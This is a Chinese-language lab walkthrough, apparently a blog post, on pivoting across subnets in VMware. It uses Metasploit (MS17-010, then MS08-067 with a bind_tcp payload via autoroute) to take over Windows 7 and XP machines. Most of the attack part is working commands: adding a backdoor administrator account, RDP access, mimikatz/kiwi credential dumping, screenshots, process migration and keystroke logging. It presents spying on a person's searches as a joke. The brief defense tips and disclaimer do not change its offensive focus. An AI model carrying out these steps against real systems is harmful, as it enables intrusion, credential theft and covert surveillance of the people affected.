跨网段攻击+MS08-067漏洞复现
跨网段攻击
之前的实验是在一个网段内进行攻击。今天,我们来练习跨网段攻击。
什么是跨网段攻击呢?
我给了上面一张图,帮助大家理解。
小帅跟我是同一个网段,是可以互相连接的,但是小帅不让他弟弟小强和别人玩,怕被带坏,影响学习。
因此,小帅跟小强使用另一个网段单独组建了一个局域网,用来发送学习资料,这个时候,由于我和小强 不在同一个网段,没办法直接和他“做朋友”
就可以利用小帅当跳板,来和小强“交个朋友”
跨网段攻击差不多就这个意思
话不多说,开始实战!
配置实验环境
我的电脑
- 操作系统:Kali-Linux-2021
- 网络:NAT模式(网络地址转换,让内部局域网络能够访问互联网的)
- IP:10.10.10.128
- 更改虚拟机设置网络适配器为NAT模式
2.在VMware的编辑中打开虚拟网络编辑器
3.在虚拟网络编辑器中点击更改设置后选择NAT模式
4.设置子网IP,这里设置为10.10.10.0,然后点击应用、确定
5.然后打开我的kali虚拟机啊,发现右上角网络已经连接
6.鼠标右键点一下,选择连接信息就可以查看本机的网络配置了(我们也可以打开终端输入ifconfig查看)
7.然后,问题来了,我明明改的子网是10.10.10.0,这里怎么是10.0.0.3呢
8.原来是因为我之前是手动配置的IP地址来进行实验的,那么现在我们来简单调整一下吧
右击选择编辑网络
9.打开后双击我们的网络连接1
10.点击IPv4设置,可以看到我之前是手动配置的IP,现在点击Method后面的Manual(手动)切换成Automatic(DHCP)自动获取IP地址,然后点击下面的10.0.0.3,选择右边的Delete(删除)(好像不删除它先选用手动配置的IP),最后点右下角的save(保存)
11.之后查看网络信息就可以发现给我们自动分配的IP地址变成了10.10.10.128(没变的可以试着关机重启或者点击VMware软件右下角网络适配器NAT选择断开连接然后重新连接)
通过上述操作,我的攻击主机已经配置完毕,接下来配置小帅的环境
小帅的电脑
- 操作系统:Windows7
- 网络1:NAT IP:10.10.10.129
- 网络2:VMnet1 IP:192.168.80.128
1.小帅有两个网络连接,一个用于连接互联网,浏览丰富资源,可以和我连通,一个用来和弟弟小强组成局域网发送信息。这里的第一个网络适配器选用NAT,用于上网;第二个选择VMnet1(仅主机模式)ps:大家随便选一个,我这里1-7应该都是可以的,但是选了之后要在虚拟网络编辑器里添加对应的VMnet
2.可以看到虚拟网络编辑器中VMnet8之前改过了,进去会自动分配IP,现在我们改一下VMnet1的子网
3.由于我之前手动配置的IP,现在进去没有给我分配,那我就要重新设置一下了,首先右击网络,打开网络和共享中心,选择更改适配器设置
4.右击本地连接,选择属性
5.双击IPv4,进行配置
6.选择自动获得IP地址和DNS服务器地址
7.把确定点完,发现我们的电脑已经可以上网啦!
8.接下来配置本地连接2,打开IPv4配置,我们选择自动获取。
接下来点确定保存好IP,小帅的环境就搭建好啦!
小强的电脑
- 操作系统:Windows XP
- 网络:VMnet1
- IP:192.168.80.129
1.虚拟机设置网络适配器为跟哥哥小帅一样的VMnet1虚拟局域网
2.右击,打开网络连接
3.选择properties属性
4.双击TCP/IP进行配置,选择自动获取
5.按OK保存
此时小强的环境也配置好了,接下来就可以开始真正的跨网段攻击了!!!
开始攻击!!
使用MS17-010漏洞攻击小帅,获取小帅的主机权限
- 成功攻击小帅,进入到我们的meterpreter界面
- 输入命令,查看当前权限,权限不够的话需要提权,可以看到现在已经是管理员权限
getuid
- 输入shell,进入Windows7的命令行界面,发现有乱码
shell
- 编码格式的问题,这里输入chcp 65001(改变当前活动代码页为UTF-8,让当前的批处理窗口支持UTF-8格式的文件),发现问题解决,绝大部分都能看懂了。然后输入ipconfig,发现了小帅的第二个IP
chcp 65001
ipconfig
- 输入命令,查看IP地址的ARP缓存项,发现我们自己的IP了,后面是动态连接的,再看下刚才发现的另一个IP192.168.80.128,发现有个IP也是动态连接的
arp -a
-
我们和这个IP无法直接连接,于是我们就可以进行跨网段攻击来入侵小强的电脑了
-
Ctrl+c键返回我们的meterpreter界面
- 使用autoroute脚本将内网网段192.168.80.0/24添加到我的路由表,输入命令查看是否添加
run autoroute -s 192.168.80.0/24
run autoroute -p
- 添加成功,然后输入命令将meterpreter终端隐藏在后台,我们就可以对小强开始攻击啦!
background
MS08-067漏洞复现攻击小强
环境
- 攻击机:Kali-Linux-2021 IP:10.10.10.128
- 靶机:Windows XP IP:192.168.80.129
工具
- Metasploit
- Meterpreter
开始攻击
- 这里知道目标主机是XP系统,我们选择使用MS08-067漏洞进行攻击
- 查看配置参数,发现需要填目标主机,同时我们注意到载荷采用的是tcp反向连接,由于小强是内网,无法连接我们,因此我们需要采用正向连接
- 设置载荷
set payload windows/meterpreter/bind_tcp
- 设置受害者IP
set rhosts 192.168.80.129
- 检查无误后开始攻击,攻击成功,进入meterpreter终端
run
MS08-067漏洞防范
- 关闭相关端口(445)
- 安装杀毒软件和补丁
- 防火墙进行流量监测
到这里我们的跨网段攻击就完成啦!!!小强也是我们的好朋友了!
后渗透攻击小帅
远程桌面连接
- 将与小强连接的meterpreter会话放在后台,连接之前与小帅的会话
- 进入shell界面,创建账号“猜猜我是谁”,并将它设置为管理员
net user GuessWhoami 5201314 /add
net localgroup administrators GuessWhoami /add
- 然后我们再打开一个终端使用远程桌面连接小帅,选择yes
rdesktop 10.10.10.129
- 然后使用我们的新账号登录,成功!
- 这个时候,我突发奇想,那我岂不是可以用小帅再远程桌面连接小强
由于我们前面已经成功跨网段攻击了小强,获取账号、创建账号是很容易的,后续操作就不演示了
使用mimikatz抓取保存在内存的密码
- meterpreter里面是内置有mimikatz的,我们直接启用就行,但是我们发现这个工具已经被取代啦,现在的kiwi是更好的
load mimikatz
- 我们第一次见,不会用,那就查看帮助
help kiwi
- 哈哈哈哈,还是看不懂,看不懂就一个一个试!账户密码不就出来了嘛!
桌面截屏、键盘监听
- 桌面截屏,这个很简单了,上次已经做过了,让我们看看他在干嘛
screenshot
- ?!!什么!!!不学习在上网!赶紧键盘监听,看他要干嘛
- 输入ps查看进程
ps
- 找到对应的程序,这里我们找到谷歌和对应的PID,输入命令
migrate -P 1568
- 接下来开启键盘监听,等待小帅输入
keyscan_start
- 估摸着差不多了,输入命令看看小帅搜的什么
keyscan_dump \\获取监听
keyscan_stop \\停止监听
- 怎么追求一个女孩子?我们的小帅同学已经春心萌动了吗?不是说好一起好好学习的吗?小帅啊小帅!
由于小帅的电脑有问题,未能安装好摄像头,很遗憾没有拍下小帅的帅照(T^T)
声明
以上内容仅代表作者个人观点,本文仅作为网络安全学习参考,作者不承担任何法律责任。